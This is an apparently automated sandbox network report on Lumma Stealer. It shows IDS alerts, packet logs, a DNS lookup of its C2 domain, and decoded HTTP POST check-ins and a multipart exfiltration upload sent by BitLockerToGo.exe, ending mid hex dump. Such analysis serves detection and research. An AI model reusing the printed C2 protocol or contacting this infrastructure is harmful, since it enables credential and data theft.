2024-12-26T12:01:28.174922+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:30.177968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:31.200309+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49738 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:32.745925+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:35.447332+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:37.988249+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:40.516752+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:40.521382+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49742 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:43.487771+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 172.67.180.113 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 12:01:23.899168015 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:23.899274111 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:23.899378061 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:23.903027058 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:23.903065920 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.213948011 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.214023113 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:25.218405962 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:25.218420029 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.218708992 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.268682003 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:25.285439014 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:25.285464048 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:25.285568953 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.996824026 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.996958017 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:25.997016907 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:26.001116991 CET | 49735 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:26.001159906 CET | 443 | 49735 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:26.058948994 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:26.059001923 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:26.059077024 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:26.059376001 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:26.059390068 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:27.363202095 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:27.363336086 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:27.364753008 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:27.364764929 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:27.365003109 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:27.374068975 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:27.374093056 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:27.374146938 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.174926996 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.174995899 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.175029993 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.175050020 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.175060987 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.175071955 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.175101042 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.176512957 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.176563025 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.184732914 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.193152905 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.193181038 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.193203926 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.193223953 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.193269014 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.294567108 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.346889973 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.346905947 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.388631105 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.388720989 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.388825893 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.388842106 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.388880968 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.520076990 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.520123005 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.520134926 CET | 49737 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.520142078 CET | 443 | 49737 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.870455980 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.870485067 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:28.870560884 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.871269941 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:28.871282101 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:30.177895069 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:30.177968025 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:30.179414034 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:30.179425955 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:30.179665089 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:30.186321974 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:30.186491013 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:30.186527014 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:30.189372063 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:30.189379930 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:31.200304985 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:31.200404882 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:31.200453043 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:31.214903116 CET | 49738 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:31.214916945 CET | 443 | 49738 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:31.440697908 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:31.440743923 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:31.440812111 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:31.441787004 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:31.441802025 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:32.745831013 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:32.745924950 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:32.747322083 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:32.747334957 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:32.747572899 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:32.752517939 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:32.752671003 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:32.752698898 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:33.552439928 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:33.552527905 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:33.552592993 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:33.552781105 CET | 49739 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:33.552797079 CET | 443 | 49739 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:34.142524004 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:34.142549038 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:34.142673016 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:34.143016100 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:34.143024921 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:35.447256088 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:35.447331905 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:35.448596001 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:35.448601961 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:35.448822975 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:35.450059891 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:35.450196028 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:35.450217009 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:35.450278997 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:35.450284004 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:36.428957939 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:36.429079056 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:36.429116964 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:36.429267883 CET | 49740 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:36.429280996 CET | 443 | 49740 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:36.682248116 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:36.682281017 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:36.682339907 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:36.682765007 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:36.682780027 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:37.988176107 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:37.988249063 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:37.989676952 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:37.989687920 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:37.989931107 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:37.991230011 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:37.991332054 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:37.991339922 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:38.826598883 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:38.826672077 CET | 443 | 49741 | 172.67.180.113 | 192.168.2.4
Dec 26, 2024 12:01:38.826719999 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
Dec 26, 2024 12:01:38.826901913 CET | 49741 | 443 | 192.168.2.4 | 172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:38.826910973 CET44349741172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:39.211967945 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212025881 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:39.212115049 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212482929 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:39.212491989 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.516666889 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.516752005 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.518101931 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.518106937 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.518327951 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.519706964 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.520935059 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.520956993 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521034956 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521055937 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521146059 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521240950 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521336079 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521363020 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521462917 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521493912 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521636009 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521661997 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521665096 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521677017 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521785975 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521805048 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521817923 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521833897 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521935940 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521962881 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521984100 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563337088 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.563483000 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563534021 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563553095 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.607341051 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176614046 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176693916 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176743984 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.176919937 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.176934958 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.186593056 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.186618090 CET44349743172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.186702967 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.187083960 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.187097073 CET44349743172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.487771034 CET49743443192.168.2.4172.67.180.113
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 26, 2024 12:01:23.516125917 CET  58196        53         192.168.2.4  1.1.1.1
Dec 26, 2024 12:01:23.891695023 CET  53           58196      1.1.1.1      192.168.2.4

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Dec 26, 2024 12:01:23.516125917 CET  192.168.2.4  1.1.1.1  0x1420    Standard query (0)  treehoneyi.click  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address         Type            Class        DNS over HTTPS
Dec 26, 2024 12:01:23.891695023 CET  1.1.1.1    192.168.2.4  0x1420    No error (0)  treehoneyi.click  -      172.67.180.113  A (IP address)  IN (0x0001)  false
Dec 26, 2024 12:01:23.891695023 CET  1.1.1.1    192.168.2.4  0x1420    No error (0)  treehoneyi.click  -      104.21.91.209   A (IP address)  IN (0x0001)  false
                                                                                                                    • treehoneyi.click
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49735        172.67.180.113  443               7676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:01:25 UTC  263                OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: treehoneyi.click

2024-12-26 11:01:25 UTC  8                  OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2024-12-26 11:01:25 UTC  1125               IN
HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=84r2i3qg0qqfmo101e1qh1uuc4; expires=Mon, 21 Apr 2025 04:48:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJI3JdU1nK12gPV4DmKgKAdwhldrjXnpQyS%2FMK%2BqGeufsR7mcLmIbL93lwWgYiEuHm12KpLzK53Jnoj5%2FLL%2FSZqhtMiNkIKhTr1enJnh3TDHyEXbf%2FEmbJMi3PzCEggVyKR6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092a25f6e0cc4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1585&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1818181&cwnd=147&unsent_bytes=0&cid=775e93d7c43ce272&ts=794&x=0"

2024-12-26 11:01:25 UTC  7                  IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2024-12-26 11:01:25 UTC  5                  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49737        172.67.180.113  443               7676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:01:27 UTC  264                OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: treehoneyi.click

2024-12-26 11:01:27 UTC  47                 OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 72 41 47 78 53 46 2d 2d 73 68 65 65 76 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=rAGxSF--sheev&j=

2024-12-26 11:01:28 UTC  1117               IN
HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=orejp4cslu4h4ecenbtuerp2du; expires=Mon, 21 Apr 2025 04:48:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W01ROky7airUeMtjODVBXPRwjSw341Nb4KxgcIpwjhHXieSITmpioxiVMIGpU154ClpD9q7tvK21Nr%2ByaIBFNyHBqsREuxgBGTG3S8WHRKQg9msNSBNCho82DFkTALrCs03w"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092afcdccc339-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1624&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=947&delivery_rate=1765417&cwnd=247&unsent_bytes=0&cid=293e97ac6cd4f606&ts=817&x=0"
                                                                                                                    Data Ascii: c2ibflcLL8tu1rCZDkc9pfjcVHo77H8DzCn6YkwVBq4juN2t0ZdnCOlV8B1Fm/bh+F8RKzJ9qNGKeqj8D5cXMeY8yC3GgzpePsLnDZUdajC6DhGrvmx6h1xp6PwKFwdhNKxaPQIHu4elXnMdQYv85zJSErt4f+1WS6n//B/XAK+gOsuyFBdsWDzGfJgCSz/huY7f+X58L9EM6WwvWAbGsmApS6vTlPpJLoZnzNVea3DoCYN8aHo8ll/v+P+MA4a
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 6a 6d 55 79 69 71 4d 61 68 5a 7a 43 4e 4a 59 76 37 51 72 79 51 52 72 75 76 67 38 68 64 76 74 65 72 6c 49 30 73 4b 31 64 2f 74 64 37 63 49 58 66 46 79 35 52 6e 56 49 31 39 69 76 35 50 6c 5a 46 6e 74 2b 66 4c 31 63 51 48 42 73 72 64 32 48 31 53 51 30 65 46 42 39 42 55 52 70 53 65 39 5a 2f 6c 32 42 43 7a 32 6c 2b 46 6e 48 36 43 76 2f 76 49 58 42 71 65 67 75 6e 64 51 45 73 76 52 73 47 44 38 43 42 72 70 48 2b 55 5a 33 79 4e 66 59 73 32 54 2b 58 68 59 2b 50 36 38 6c 45 77 34 34 62 4b 2b 5a 77 30 61 79 59 43 6c 4c 71 39 4d 55 2b 6b 6b 75 68 6d 66 4d 31 56 35 72 63 4f 67 4a 67 33 78 6f 65 6a 79 57 58 2b 2f 34 76 34 77 44 68 72 66 67 4f 52 67 2b 68 38 65 70 79 4f 35 53 38 46 67 45 53 47 2f 72 73 6c 54 55 75 50 71 2f 37 56 78 41 63 61 37 6f 48 30 54 58 62 6e 2b 6c
                                                                                                                    Data Ascii: jmUyiqMahZzCNJYv7QryQRruvg8hdvterlI0sK1d/td7cIXfFy5RnVI19iv5PlZFnt+fL1cQHBsrd2H1SQ0eFB9BURpSe9Z/l2BCz2l+FnH6Cv/vIXBqegundQEsvRsGD8CBrpH+UZ3yNfYs2T+XhY+P68lEw44bK+Zw0ayYClLq9MU+kkuhmfM1V5rcOgJg3xoejyWX+/4v4wDhrfgORg+h8epyO5S8FgESG/rslTUuPq/7VxAca7oH0TXbn+l


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 172.67.180.113 | 443 | 7676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:01:30 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QN7TZRE36WB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18121
Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:30 UTC15331OUTData Raw: 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74
